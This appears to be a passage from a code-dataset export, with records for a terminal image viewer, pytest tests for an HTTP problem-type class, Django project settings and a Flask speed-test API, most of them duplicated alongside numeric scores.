PALETTES[palette or DEFAULT_PALETTE] + ANSI_256))
)
self.pal.load()
self.func_fg = lambda x: '\x1b[38;5;%dm' % x
self.func_bg = lambda x: '\x1b[48;5;%dm' % x
else:
# 24bit
self.colors = None
self.pal = None
self.func_fg = lambda x: '\x1b[38;2;%d;%d;%dm' % x
self.func_bg = lambda x: '\x1b[48;2;%d;%d;%dm' % x
def convert(self, img, width, height):
newimg = img.convert('RGB').resize((width, height), Image.LANCZOS)
if self.pal:
im = newimg.im.convert('P', 1, self.pal.im)
newimg = newimg._makeself(im)
padding = height % 2
lastfg = lastbg = None
yield '\x1b[?25l\x1b[2J\x1b[1H'
for y in range(0, height, 2):
if y:
yield '\n'
if padding and y == height-1:
yield '\x1b[49m'
for x in range(width):
fg = newimg.getpixel((x, y))
if lastfg != fg or self.colors == 16:
yield self.func_fg(fg)
lastfg = fg
if not padding or y != height-1:
bg = newimg.getpixel((x, y+1))
if lastbg != bg:
yield self.func_bg(bg)
lastbg = bg
yield '▀'
yield '\x1b[0;39;49m'
yield '\x1b[?25h'
def paint(filename, mode='24b', palette=None, width=None, height=None):
if not palette:
term = os.environ.get('TERM', '')
if os.environ.get('VTE_VERSION') and term.endswith('-256color'):
palette = 'tango'
elif term == 'linux':
palette = 'linux'
elif term.startswith('rxvt'):
palette = 'rxvt'
else:
palette = 'xterm'
ia = Image2ANSI(mode, palette)
img = Image.open(filename)
if width and not height:
width = int(width)
height = int(width / img.width * img.height)
elif height and not width:
height = int(height)
width = int(height / img.height * img.width)
else:
width, height = get_terminal_dimensions()
height *= 2
neww = int(height / img.height * img.width)
newh = int(width / img.width * img.height)
if neww > width:
height = newh
elif newh > height:
width = neww
for s in ia.convert(img, width, height):
sys.stdout.write(s)
sys.stdout.flush()
try:
input()
except (EOFError, KeyboardInterrupt) as ex:
pass
if __name__ == '__main__':
sys.exit(paint(*sys.argv[1:])) | termivis.py |
import os
import sys
import fcntl
import struct
import termios
import argparse
import itertools
from PIL import Image
from PIL.ImagePalette import ImagePalette
PALETTES = {
'tango': (
(0x00, 0x00, 0x00), (0xcc, 0x00, 0x00),
(0x4e, 0x9a, 0x06), (0xc4, 0xa0, 0x00),
(0x34, 0x65, 0xa4), (0x75, 0x50, 0x7b),
(0x06, 0x98, 0x9a), (0xd3, 0xd7, 0xcf),
(0x55, 0x57, 0x53), (0xef, 0x29, 0x29),
(0x8a, 0xe2, 0x34), (0xfc, 0xe9, 0x4f),
(0x72, 0x9f, 0xcf), (0xad, 0x7f, 0xa8),
(0x34, 0xe2, 0xe2), (0xee, 0xee, 0xec)
),
'linux': (
(0x00, 0x00, 0x00), (0xaa, 0x00, 0x00),
(0x00, 0xaa, 0x00), (0xaa, 0x55, 0x00),
(0x00, 0x00, 0xaa), (0xaa, 0x00, 0xaa),
(0x00, 0xaa, 0xaa), (0xaa, 0xaa, 0xaa),
(0x55, 0x55, 0x55), (0xff, 0x55, 0x55),
(0x55, 0xff, 0x55), (0xff, 0xff, 0x55),
(0x55, 0x55, 0xff), (0xff, 0x55, 0xff),
(0x55, 0xff, 0xff), (0xff, 0xff, 0xff)
),
'xterm': (
(0x00, 0x00, 0x00), (0xcd, 0x00, 0x00),
(0x00, 0xcd, 0x00), (0xcd, 0xcd, 0x00),
(0x00, 0x00, 0xee), (0xcd, 0x00, 0xcd),
(0x00, 0xcd, 0xcd), (0xe5, 0xe5, 0xe5),
(0x7f, 0x7f, 0x7f), (0xff, 0x00, 0x00),
(0x00, 0xff, 0x00), (0xff, 0xff, 0x00),
(0x5c, 0x5c, 0xff), (0xff, 0x00, 0xff),
(0x00, 0xff, 0xff), (0xff, 0xff, 0xff)
),
'rxvt': (
(0x00, 0x00, 0x00), (0xcd, 0x00, 0x00),
(0x00, 0xcd, 0x00), (0xcd, 0xcd, 0x00),
(0x00, 0x00, 0xcd), (0xcd, 0x00, 0xcd),
(0x00, 0xcd, 0xcd), (0xfa, 0xeb, 0xd7),
(0x40, 0x40, 0x40), (0xff, 0x00, 0x00),
(0x00, 0xff, 0x00), (0xff, 0xff, 0x00),
(0x00, 0x00, 0xff), (0xff, 0x00, 0xff),
(0x00, 0xff, 0xff), (0xff, 0xff, 0xff)
),
'solarized': (
(0x07, 0x36, 0x42), (0xdc, 0x32, 0x2f),
(0x85, 0x99, 0x00), (0xb5, 0x89, 0x00),
(0x26, 0x8b, 0xd2), (0xd3, 0x36, 0x82),
(0x2a, 0xa1, 0x98), (0xee, 0xe8, 0xd5),
(0x00, 0x2b, 0x36), (0xcb, 0x4b, 0x16),
(0x58, 0x6e, 0x75), (0x65, 0x7b, 0x83),
(0x83, 0x94, 0x96), (0x6c, 0x71, 0xc4),
(0x93, 0xa1, 0xa1), (0xfd, 0xf6, 0xe3)
)
}
ANSI_256 = tuple(tuple(int(x[y*2:(y+1)*2], 16) for y in range(3)) for x in (
'000000,00005f,000087,0000af,0000d7,0000ff,005f00,005f5f,'
'005f87,005faf,005fd7,005fff,008700,00875f,008787,0087af,'
'0087d7,0087ff,00af00,00af5f,00af87,00afaf,00afd7,00afff,'
'00d700,00d75f,00d787,00d7af,00d7d7,00d7ff,00ff00,00ff5f,'
'00ff87,00ffaf,00ffd7,00ffff,5f0000,5f005f,5f0087,5f00af,'
'5f00d7,5f00ff,5f5f00,5f5f5f,5f5f87,5f5faf,5f5fd7,5f5fff,'
'5f8700,5f875f,5f8787,5f87af,5f87d7,5f87ff,5faf00,5faf5f,'
'5faf87,5fafaf,5fafd7,5fafff,5fd700,5fd75f,5fd787,5fd7af,'
'5fd7d7,5fd7ff,5fff00,5fff5f,5fff87,5fffaf,5fffd7,5fffff,'
'870000,87005f,870087,8700af,8700d7,8700ff,875f00,875f5f,'
'875f87,875faf,875fd7,875fff,878700,87875f,878787,8787af,'
'8787d7,8787ff,87af00,87af5f,87af87,87afaf,87afd7,87afff,'
'87d700,87d75f,87d787,87d7af,87d7d7,87d7ff,87ff00,87ff5f,'
'87ff87,87ffaf,87ffd7,87ffff,af0000,af005f,af0087,af00af,'
'af00d7,af00ff,af5f00,af5f5f,af5f87,af5faf,af5fd7,af5fff,'
'af8700,af875f,af8787,af87af,af87d7,af87ff,afaf00,afaf5f,'
'afaf87,afafaf,afafd7,afafff,afd700,afd75f,afd787,afd7af,'
'afd7d7,afd7ff,afff00,afff5f,afff87,afffaf,afffd7,afffff,'
'd70000,d7005f,d70087,d700af,d700d7,d700ff,d75f00,d75f5f,'
'd75f87,d75faf,d75fd7,d75fff,d78700,d7875f,d78787,d787af,'
'd787d7,d787ff,d7af00,d7af5f,d7af87,d7afaf,d7afd7,d7afff,'
'd7d700,d7d75f,d7d787,d7d7af,d7d7d7,d7d7ff,d7ff00,d7ff5f,'
'd7ff87,d7ffaf,d7ffd7,d7ffff,ff0000,ff005f,ff0087,ff00af,'
'ff00d7,ff00ff,ff5f00,ff5f5f,ff5f87,ff5faf,ff5fd7,ff5fff,'
'ff8700,ff875f,ff8787,ff87af,ff87d7,ff87ff,ffaf00,ffaf5f,'
'ffaf87,ffafaf,ffafd7,ffafff,ffd700,ffd75f,ffd787,ffd7af,'
'ffd7d7,ffd7ff,ffff00,ffff5f,ffff87,ffffaf,ffffd7,ffffff,'
'080808,121212,1c1c1c,262626,303030,3a3a3a,444444,4e4e4e,'
'585858,626262,6c6c6c,767676,808080,8a8a8a,949494,9e9e9e,'
'a8a8a8,b2b2b2,bcbcbc,c6c6c6,d0d0d0,dadada,e4e4e4,eeeeee'
).split(','))
def _getdimensions():
call = fcntl.ioctl(1, termios.TIOCGWINSZ, "\000"*8)
height, width = struct.unpack("hhhh", call)[:2]
return width, height
def get_terminal_dimensions():
# Copied from PyPy.
try:
width, height = _getdimensions()
except (KeyboardInterrupt, SystemExit, MemoryError, GeneratorExit):
raise
except:
# FALLBACK
width = int(os.environ.get('COLUMNS', 80))
height = int(os.environ.get('LINES', 80))
else:
# XXX the windows getdimensions may be bogus, let's sanify a bit
if width < 40:
width = 80
height = 24
return width, height
class Image2ANSI:
DEFAULT_PALETTE = 'tango'
def __init__(self, mode, palette=None):
if mode == '4b':
self.colors = 16
self.pal = Image.new('P', (4, 4))
self.pal.putpalette(
tuple(itertools.chain.from_iterable(
PALETTES[palette or DEFAULT_PALETTE])) * 16
)
self.pal.load()
self.func_fg = lambda x: '\x1b[%d%dm' % (9 if x//8 else 3, x%8)
self.func_bg = lambda x: '\x1b[%d%dm' % (10 if x//8 else 4, x%8)
elif mode == '8b':
self.colors = 256
self.pal = Image.new('P', (16, 16))
self.pal.putpalette(
tuple(itertools.chain.from_iterable(
PALETTES[palette or DEFAULT_PALETTE] + ANSI_256))
)
self.pal.load()
self.func_fg = lambda x: '\x1b[38;5;%dm' % x
self.func_bg = lambda x: '\x1b[48;5;%dm' % x
else:
# 24bit
self.colors = None
self.pal = None
self.func_fg = lambda x: '\x1b[38;2;%d;%d;%dm' % x
self.func_bg = lambda x: '\x1b[48;2;%d;%d;%dm' % x
def convert(self, img, width, height):
newimg = img.convert('RGB').resize((width, height), Image.LANCZOS)
if self.pal:
im = newimg.im.convert('P', 1, self.pal.im)
newimg = newimg._makeself(im)
padding = height % 2
lastfg = lastbg = None
yield '\x1b[?25l\x1b[2J\x1b[1H'
for y in range(0, height, 2):
if y:
yield '\n'
if padding and y == height-1:
yield '\x1b[49m'
for x in range(width):
fg = newimg.getpixel((x, y))
if lastfg != fg or self.colors == 16:
yield self.func_fg(fg)
lastfg = fg
if not padding or y != height-1:
bg = newimg.getpixel((x, y+1))
if lastbg != bg:
yield self.func_bg(bg)
lastbg = bg
yield '▀'
yield '\x1b[0;39;49m'
yield '\x1b[?25h'
def paint(filename, mode='24b', palette=None, width=None, height=None):
if not palette:
term = os.environ.get('TERM', '')
if os.environ.get('VTE_VERSION') and term.endswith('-256color'):
palette = 'tango'
elif term == 'linux':
palette = 'linux'
elif term.startswith('rxvt'):
palette = 'rxvt'
else:
palette = 'xterm'
ia = Image2ANSI(mode, palette)
img = Image.open(filename)
if width and not height:
width = int(width)
height = int(width / img.width * img.height)
elif height and not width:
height = int(height)
width = int(height / img.height * img.width)
else:
width, height = get_terminal_dimensions()
height *= 2
neww = int(height / img.height * img.width)
newh = int(width / img.width * img.height)
if neww > width:
height = newh
elif newh > height:
width = neww
for s in ia.convert(img, width, height):
sys.stdout.write(s)
sys.stdout.flush()
try:
input()
except (EOFError, KeyboardInterrupt) as ex:
pass
if __name__ == '__main__':
sys.exit(paint(*sys.argv[1:])) | 0.078269 | 0.271179 |
import pytest
from problems.types import ProblemType
def test_construct_blank_type():
problem_type = ProblemType()
assert problem_type.identifier == "about:blank"
assert problem_type.title == ""
assert problem_type.detail == ""
assert problem_type.extension == {}
# identifier validation
def test_convert_blank_type_to_string():
problem_type = ProblemType()
assert str(problem_type) == "about:blank"
def test_identifier_must_not_be_empty():
with pytest.raises(ValueError):
ProblemType(identifier="")
def test_identifier_inserts_default_scheme():
problem_type = ProblemType("//example.com/baz")
assert problem_type.identifier == "https://example.com/baz"
@pytest.mark.parametrize("input", ("foo/bar", "/foo/bar"))
@pytest.mark.parametrize("expected", ("https://example.com/foo/bar",))
def test_identifier_inserts_default_scheme_and_host(input, expected):
problem_type = ProblemType(input)
assert problem_type.identifier == expected
def test_rejects_unallowed_hostname():
with pytest.raises(ValueError) as ex:
ProblemType("https://foo.bar/baz")
assert str(ex).endswith(
"Host was required to be one of ['example.com'] but was 'foo.bar'"
)
def test_rejects_identifier_without_path():
with pytest.raises(ValueError) as ex:
ProblemType("https://example.com")
assert str(ex).endswith("path was required but missing")
# extensions
@pytest.mark.parametrize("input", ProblemType.BANNED_EXTENSION_NAMES)
def test_extension_is_rejected_if_includes_class_attribute_names(input):
with pytest.raises(ValueError) as ex:
ProblemType(extension={input: {}})
assert str(ex).endswith(f"Extension member name {input} is not allowed.")
def test_extension_is_rejected_if_not_valid_json_schema():
with pytest.raises(TypeError) as ex:
ProblemType(extension={"foo": []})
assert str(ex).endswith("Extension for field 'foo' needs to be a valid JSON schema.")
# serialisation to dict
def test_convert_type_to_dict():
problem_type = ProblemType(
"https://example.com/foo",
"Foo problem",
"Foo fighters attack",
extension={"bar": {}, "baz": {}},
)
assert dict(problem_type) == {
"identifier": "https://example.com/foo",
"title": "Foo problem",
"detail": "Foo fighters attack",
"extension": {"bar": {}, "baz": {}},
}
def test_convert_blank_type_to_dict():
problem_type = ProblemType()
assert dict(problem_type) == {
"identifier": "about:blank",
"title": "",
"detail": "",
"extension": {},
}
# formatting title and description
def test_format_title_simple():
problem_type = ProblemType("https://example.com/foo", extension={"bar": {"type": "string"}})
assert problem_type.format("test {foo}", {"foo": "bar baz bam"}) == "test bar baz bam"
def test_format_title_nested():
nested_schema = {"foo": {"type": "object", "items": {"bar": {"type": "string"}}}}
problem_type = ProblemType("https://example.com/foo", extension=nested_schema)
assert (
problem_type.format("test {foo.bar}", {"foo": {"bar": "bar baz bam"}})
== "test bar baz bam"
)
def test_format_title_raises_error_on_incorrect_nested_key():
nested_schema = {"foo": {"type": "object", "items": {"bar": {"type": "string"}}}}
problem_type = ProblemType("https://example.com/foo", extension=nested_schema)
with pytest.raises(AttributeError) as ex:
problem_type.format("test {foo.baa}", {"foo": {"bar": "bar baz bam"}})
assert "object has no attribute 'baa'" in str(ex.value) | src/tests/test_types.py | import pytest
from problems.types import ProblemType
def test_construct_blank_type():
problem_type = ProblemType()
assert problem_type.identifier == "about:blank"
assert problem_type.title == ""
assert problem_type.detail == ""
assert problem_type.extension == {}
# identifier validation
def test_convert_blank_type_to_string():
problem_type = ProblemType()
assert str(problem_type) == "about:blank"
def test_identifier_must_not_be_empty():
with pytest.raises(ValueError):
ProblemType(identifier="")
def test_identifier_inserts_default_scheme():
problem_type = ProblemType("//example.com/baz")
assert problem_type.identifier == "https://example.com/baz"
@pytest.mark.parametrize("input", ("foo/bar", "/foo/bar"))
@pytest.mark.parametrize("expected", ("https://example.com/foo/bar",))
def test_identifier_inserts_default_scheme_and_host(input, expected):
problem_type = ProblemType(input)
assert problem_type.identifier == expected
def test_rejects_unallowed_hostname():
with pytest.raises(ValueError) as ex:
ProblemType("https://foo.bar/baz")
assert str(ex).endswith(
"Host was required to be one of ['example.com'] but was 'foo.bar'"
)
def test_rejects_identifier_without_path():
with pytest.raises(ValueError) as ex:
ProblemType("https://example.com")
assert str(ex).endswith("path was required but missing")
# extensions
@pytest.mark.parametrize("input", ProblemType.BANNED_EXTENSION_NAMES)
def test_extension_is_rejected_if_includes_class_attribute_names(input):
with pytest.raises(ValueError) as ex:
ProblemType(extension={input: {}})
assert str(ex).endswith(f"Extension member name {input} is not allowed.")
def test_extension_is_rejected_if_not_valid_json_schema():
with pytest.raises(TypeError) as ex:
ProblemType(extension={"foo": []})
assert str(ex).endswith("Extension for field 'foo' needs to be a valid JSON schema.")
# serialisation to dict
def test_convert_type_to_dict():
problem_type = ProblemType(
"https://example.com/foo",
"Foo problem",
"Foo fighters attack",
extension={"bar": {}, "baz": {}},
)
assert dict(problem_type) == {
"identifier": "https://example.com/foo",
"title": "Foo problem",
"detail": "Foo fighters attack",
"extension": {"bar": {}, "baz": {}},
}
def test_convert_blank_type_to_dict():
problem_type = ProblemType()
assert dict(problem_type) == {
"identifier": "about:blank",
"title": "",
"detail": "",
"extension": {},
}
# formatting title and description
def test_format_title_simple():
problem_type = ProblemType("https://example.com/foo", extension={"bar": {"type": "string"}})
assert problem_type.format("test {foo}", {"foo": "bar baz bam"}) == "test bar baz bam"
def test_format_title_nested():
nested_schema = {"foo": {"type": "object", "items": {"bar": {"type": "string"}}}}
problem_type = ProblemType("https://example.com/foo", extension=nested_schema)
assert (
problem_type.format("test {foo.bar}", {"foo": {"bar": "bar baz bam"}})
== "test bar baz bam"
)
def test_format_title_raises_error_on_incorrect_nested_key():
nested_schema = {"foo": {"type": "object", "items": {"bar": {"type": "string"}}}}
problem_type = ProblemType("https://example.com/foo", extension=nested_schema)
with pytest.raises(AttributeError) as ex:
problem_type.format("test {foo.baa}", {"foo": {"bar": "bar baz bam"}})
assert "object has no attribute 'baa'" in str(ex.value) | 0.816113 | 0.771241 |
import pathlib
from django.utils.translation import ugettext_lazy as _
import dj_database_url
from .env import env
BASE_DIR = pathlib.Path(__file__).parent.parent
SETTINGS_DIR = BASE_DIR / 'settings'
APPS_DIR = BASE_DIR / 'apps'
ALLOWED_HOSTS = ['*'] # Host checking done by web server.
ROOT_URLCONF = 'apps.urls'
WSGI_APPLICATION = 'apps.wsgi.application'
AUTH_USER_MODEL = 'users.User'
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
]
AUTHENTICATION_BACKENDS = (
'social.backends.facebook.FacebookOAuth2',
'django.contrib.auth.backends.ModelBackend',
)
SOCIAL_AUTH_USER_FIELDS = ['email']
SOCIAL_AUTH_PROFILE_EXTRA_PARAMS = {'fields': 'email'}
SOCIAL_AUTH_FACEBOOK_SCOPE = ['public_profile', 'email']
SOCIAL_AUTH_FACEBOOK_KEY = env('SOCIAL_AUTH_FACEBOOK_KEY')
SOCIAL_AUTH_FACEBOOK_SECRET = env('SOCIAL_AUTH_FACEBOOK_SECRET')
SOCIAL_AUTH_FACEBOOK_PROFILE_EXTRA_PARAMS = {
'fields': 'id, email, first_name, last_name'
}
SOCIAL_AUTH_PIPELINE = (
'social.pipeline.social_auth.social_details',
'social.pipeline.social_auth.social_uid',
'social.pipeline.social_auth.auth_allowed',
'social.pipeline.social_auth.social_user',
'social.pipeline.user.get_username',
'apps.users.pipeline.create_user',
'social.pipeline.social_auth.associate_user',
'social.pipeline.social_auth.load_extra_data',
'social.pipeline.user.user_details'
)
# Mail
EMAIL_BACKEND = 'djmail.backends.default.EmailBackend'
DJMAIL_MAX_RETRY_NUMBER = 3
INSTALLED_APPS = [
# Django
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# Third party
'rest_framework',
'rest_framework.authtoken',
'djmail',
'corsheaders',
'avatar',
'easy_thumbnails',
'django_jinja',
'crispy_forms',
'social.apps.django_app.default',
# Apps
'apps.api',
'apps.base',
'apps.users',
'apps.family',
'apps.cards',
'apps.chores',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
TEMPLATES = [
{
"BACKEND": "django_jinja.backend.Jinja2",
'DIRS': [str(APPS_DIR / 'templates')],
"APP_DIRS": True,
"OPTIONS": {
"match_extension": ".j2",
}
},
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [str(APPS_DIR / 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
# https://github.com/kennethreitz/dj-database-url#url-schema
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(env('DATABASE_URL'))
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
LANGUAGES = [
('en', _('English')),
]
# For reverse proxying
USE_X_FORWARDED_HOST = True
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTOCOL", "https")
# Logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'root': {
'handlers': ['console'],
'level': 'INFO',
},
'formatters': {
'simple': {
'format': '[%(name)s] [%(levelname)s] %(message)s'
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
},
'loggers': {
}
}
# Allow requests from any domain.
CORS_ORIGIN_ALLOW_ALL = True
# Rest Framework
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 30,
'DEFAULT_VERSIONING_CLASS': 'rest_framework.versioning.NamespaceVersioning',
'ORDERING_PARAM': 'order_by',
'TEST_REQUEST_DEFAULT_FORMAT': 'json',
}
# Avatars
AVATAR_GRAVATAR_DEFAULT = 'retro'
AVATAR_STORAGE_DIR = 'user-avatars'
AVATAR_MAX_AVATARS_PER_USER = 1 | settings/base.py | import pathlib
from django.utils.translation import ugettext_lazy as _
import dj_database_url
from .env import env
BASE_DIR = pathlib.Path(__file__).parent.parent
SETTINGS_DIR = BASE_DIR / 'settings'
APPS_DIR = BASE_DIR / 'apps'
ALLOWED_HOSTS = ['*'] # Host checking done by web server.
ROOT_URLCONF = 'apps.urls'
WSGI_APPLICATION = 'apps.wsgi.application'
AUTH_USER_MODEL = 'users.User'
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
]
AUTHENTICATION_BACKENDS = (
'social.backends.facebook.FacebookOAuth2',
'django.contrib.auth.backends.ModelBackend',
)
SOCIAL_AUTH_USER_FIELDS = ['email']
SOCIAL_AUTH_PROFILE_EXTRA_PARAMS = {'fields': 'email'}
SOCIAL_AUTH_FACEBOOK_SCOPE = ['public_profile', 'email']
SOCIAL_AUTH_FACEBOOK_KEY = env('SOCIAL_AUTH_FACEBOOK_KEY')
SOCIAL_AUTH_FACEBOOK_SECRET = env('SOCIAL_AUTH_FACEBOOK_SECRET')
SOCIAL_AUTH_FACEBOOK_PROFILE_EXTRA_PARAMS = {
'fields': 'id, email, first_name, last_name'
}
SOCIAL_AUTH_PIPELINE = (
'social.pipeline.social_auth.social_details',
'social.pipeline.social_auth.social_uid',
'social.pipeline.social_auth.auth_allowed',
'social.pipeline.social_auth.social_user',
'social.pipeline.user.get_username',
'apps.users.pipeline.create_user',
'social.pipeline.social_auth.associate_user',
'social.pipeline.social_auth.load_extra_data',
'social.pipeline.user.user_details'
)
# Mail
EMAIL_BACKEND = 'djmail.backends.default.EmailBackend'
DJMAIL_MAX_RETRY_NUMBER = 3
INSTALLED_APPS = [
# Django
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# Third party
'rest_framework',
'rest_framework.authtoken',
'djmail',
'corsheaders',
'avatar',
'easy_thumbnails',
'django_jinja',
'crispy_forms',
'social.apps.django_app.default',
# Apps
'apps.api',
'apps.base',
'apps.users',
'apps.family',
'apps.cards',
'apps.chores',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
TEMPLATES = [
{
"BACKEND": "django_jinja.backend.Jinja2",
'DIRS': [str(APPS_DIR / 'templates')],
"APP_DIRS": True,
"OPTIONS": {
"match_extension": ".j2",
}
},
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [str(APPS_DIR / 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
# https://github.com/kennethreitz/dj-database-url#url-schema
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(env('DATABASE_URL'))
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
LANGUAGES = [
('en', _('English')),
]
# For reverse proxying
USE_X_FORWARDED_HOST = True
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTOCOL", "https")
# Logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'root': {
'handlers': ['console'],
'level': 'INFO',
},
'formatters': {
'simple': {
'format': '[%(name)s] [%(levelname)s] %(message)s'
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
},
'loggers': {
}
}
# Allow requests from any domain.
CORS_ORIGIN_ALLOW_ALL = True
# Rest Framework
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 30,
'DEFAULT_VERSIONING_CLASS': 'rest_framework.versioning.NamespaceVersioning',
'ORDERING_PARAM': 'order_by',
'TEST_REQUEST_DEFAULT_FORMAT': 'json',
}
# Avatars
AVATAR_GRAVATAR_DEFAULT = 'retro'
AVATAR_STORAGE_DIR = 'user-avatars'
AVATAR_MAX_AVATARS_PER_USER = 1 | 0.263599 | 0.092115 |
from flask import request
from flask_restplus import Resource
from .models import AuthUser, SpeedtestCustomer
from .schemas import CustomerSchema, UserSchema
from sqlalchemy import func
import random, math
from app import db
import uuid
from flask_script import Command
import timeit
DATA = [
{
"id": 1,
"name": "260861f4-1008-49d3-87ef-dbd32b78fae7",
"amount": 958603672,
"user": {
"id": 27160,
"username": "260861f4-1<PASSWORD>-<PASSWORD>-87ef-<PASSWORD>fae7",
"email": "260861f4-1008-49d3-87ef-dbd32b78fae7"
}
},
{
"id": 2,
"name": "e38b4cdc-b2c9-4452-a9ed-c326c2e7f998",
"amount": 505838560,
"user": {
"id": 27161,
"username": "e38b4cdc-b2c9-4452-a9ed-c326c2e7f998",
"email": "e38b4cdc-b2c9-4452-a9ed-c326c2e7f998"
}
},
{
"id": 3,
"name": "f6d80e74-e340-49c3-a40b-02d7f1c7f874",
"amount": 590426501,
"user": {
"id": 27162,
"username": "f6d80e74-e340-49c3-a40b-02d7f1c7f874",
"email": "f6d80e74-e340-49c3-a40b-02d7f1c7f874"
}
},
{
"id": 4,
"name": "72188cda-2901-4e8c-92d2-f6a78a74cb1c",
"amount": 733092617,
"user": {
"id": 27163,
"username": "72188cda-<PASSWORD>-<PASSWORD>",
"email": "72188cda-2901-4e8c-92d2-f6a78a74cb1c"
}
},
{
"id": 5,
"name": "4c6f778b-8f16-489c-bb52-4bea615af711",
"amount": 395133510,
"user": {
"id": 27164,
"username": "4c6f778b-8f16-489c-bb52-4bea615af711",
"email": "4c6f778b-8f16-489c-bb52-4bea615af711"
}
},
{
"id": 6,
"name": "2d89c7fc-5ebd-4e63-aaea-086b254a9b1a",
"amount": 4636042,
"user": {
"id": 27165,
"username": "2d89c7fc-5ebd-4e63-aaea-086b254a9b1a",
"email": "2d89c7fc-5ebd-4e63-aaea-086b254a9b1a"
}
},
{
"id": 7,
"name": "89660999-f64a-4318-b001-696c2fbf7bdb",
"amount": 644680468,
"user": {
"id": 27166,
"username": "89660999-f64a-4318-b<PASSWORD>-<PASSWORD>bdb",
"email": "89660999-f64a-4318-b001-696c2fbf7bdb"
}
},
{
"id": 8,
"name": "a4e5c979-f15c-48fe-b3d5-2885af25e39f",
"amount": 210861397,
"user": {
"id": 27167,
"username": "a4e5c979-f15c-48fe-b3d5-<PASSWORD>",
"email": "a4e5c979-f15c-48fe-b3d5-2885af25e39f"
}
},
{
"id": 9,
"name": "1e95646c-db4b-4465-888a-dd832cfef84c",
"amount": 306301242,
"user": {
"id": 27168,
"username": "1e95646c-db4b-4465-888a-dd832cfef84c",
"email": "1e95646c-db4b-4465-888a-dd832cfef84c"
}
},
{
"id": 10,
"name": "ebbd06c9-a33b-44e1-9736-8ff2d1ac868d",
"amount": 890229987,
"user": {
"id": 27169,
"username": "ebbd06c9-a33b-44e1-9736-8ff2d1ac868d",
"email": "ebbd06c9-a33b-44e1-9736-8ff2d1ac868d"
}
}
]
def gibbs(N=100, thin=100):
x = 0
y = 0
for i in range(N):
for j in range(thin):
x = random.gammavariate(3, 1.0 / (y * y + 4))
y = random.gauss(1.0 / (x + 1), 1.0 / math.sqrt(2 * x + 2))
class SimpleList(Resource):
def get(self):
data = DATA
return data
class HeavyCodeList(Resource):
def get(self):
data = gibbs()
return { "action": "done" }
class SelectList(Resource):
def get(self):
customers = SpeedtestCustomer.query.filter().limit(100)
user_schema = CustomerSchema(many=True)
return user_schema.dump(customers)
class Count(Resource):
def get(self):
count = SpeedtestCustomer.query.count()
return { "count": count }
class PaginatedList(Resource):
def get(self, page=1):
per_page = 100
customers = SpeedtestCustomer.query.filter().paginate(page,per_page,error_out=False)
user_schema = CustomerSchema(many=True)
return user_schema.dump(customers.items)
class Aggregation(Resource):
def get(self):
amount = db.session.query(func.avg(SpeedtestCustomer.amount))
return {
"amount": amount,
"random": random.randint(10000,1000000)
}
class Create(Resource):
def post(self):
user = AuthUser(
username=str(uuid.uuid4()),
first_name=str(request.json['first_name'])
)
db.session.add(user)
db.session.commit()
return {"created": True}
class Save(Resource):
def put(self):
user = AuthUser.query.filter_by().first()
user.last_name = request.json['last_name']
db.session.commit()
return { "saved": True }
class Update(Resource):
def put(self):
